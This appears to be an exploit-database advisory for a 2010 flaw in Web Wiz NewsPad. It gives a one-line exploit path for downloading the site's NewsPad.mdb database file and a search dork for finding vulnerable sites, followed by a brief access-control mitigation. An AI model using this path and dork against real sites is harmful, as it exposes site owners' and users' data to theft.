NewsPad Database Download Vulnerability

vendor:

NewsPad

by:

keracker

5.5

CVSS

MEDIUM

Database Download Vulnerability

200

CWE

Product Name: NewsPad

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

2010

NewsPad Database Download Vulnerability

This exploit allows an attacker to download the NewsPad database file (NewsPad.mdb) from a vulnerable website. This vulnerability can be used to extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to the database file and implement proper access controls.

Source

Exploit-DB raw data:

=============================================================
NewsPad Database Download Vulnerability

=============================================================

#############################################################

#

# Exploit Title: NewsPad Database Download Vulnerability

# Date: 15/11/2010

# Author: keracker

# Software Link: www.webwiz.co.uk/webwiznewspad/downloads.asp

# Tested on: windows

# dork : "NewsPad Admin Login"

# Contact: h4m3d_68@yahoo.com ~ Black.hat.tm@gmail.com

#

############################################################

exploit # www.target.com/path/database/NewsPad.mdb


############################################################

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

      WE ARE BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker